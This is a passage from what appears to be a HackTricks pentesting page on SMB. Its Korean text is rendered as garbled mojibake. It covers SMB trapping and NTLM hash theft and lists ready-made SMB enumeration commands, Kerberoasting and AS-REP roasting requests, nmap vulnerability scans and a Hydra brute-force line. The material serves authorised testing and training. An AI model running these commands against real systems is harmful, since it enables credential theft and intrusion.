μ΄λ λ€μ ν¨μμμ λ°μν©λλ€:
* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream
μΌλΆ λΈλΌμ°μ μ λꡬ(μ: Skype)μμ μ¬μ©λ©λλ€.
.png>)
### MitMfλ₯Ό μ΄μ©ν SMBTrap
.png>)
## NTLM νμ·¨
SMB νΈλνκ³Ό μ μ¬νκ², μ
μ± νμΌμ λμ μμ€ν
μ μ¬μΌλ©΄(SMBλ₯Ό ν΅ν΄, μλ₯Ό λ€μ΄) SMB μΈμ¦ μλκ° λ°μν μ μμΌλ©°, μ΄λ₯Ό ν΅ν΄ NetNTLMv2 ν΄μλ₯Ό Responderμ κ°μ λκ΅¬λ‘ κ°λ‘μ± μ μμ΅λλ€. ν΄μλ μ€νλΌμΈμμ ν¬λλκ±°λ [SMB 릴λ μ΄ κ³΅κ²©](./#smb-relay-attack)μ μ¬μ©λ μ μμ΅λλ€.
[μ°Έμ‘°: ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## HackTricks μλ λͺ
λ Ή
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as βNBT over IPβ, Port 445 is βSMB over IPβ. SMB stands for βServer Message Blocksβ. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
{% hint style="success" %}
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks μ§μνκΈ°
* [**ꡬλ
κ³ν**](https://github.com/sponsors/carlospolop) νμΈνκΈ°!
* **π¬ [**Discord κ·Έλ£Ή**](https://discord.gg/hRep4RUj7f) λλ [**ν
λ κ·Έλ¨ κ·Έλ£Ή**](https://t.me/peass)μ μ°Έμ¬νκ±°λ **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**λ₯Ό νλ‘μ°νμΈμ.**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks) λ° [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νμ 곡μ νμΈμ.**
{% endhint %}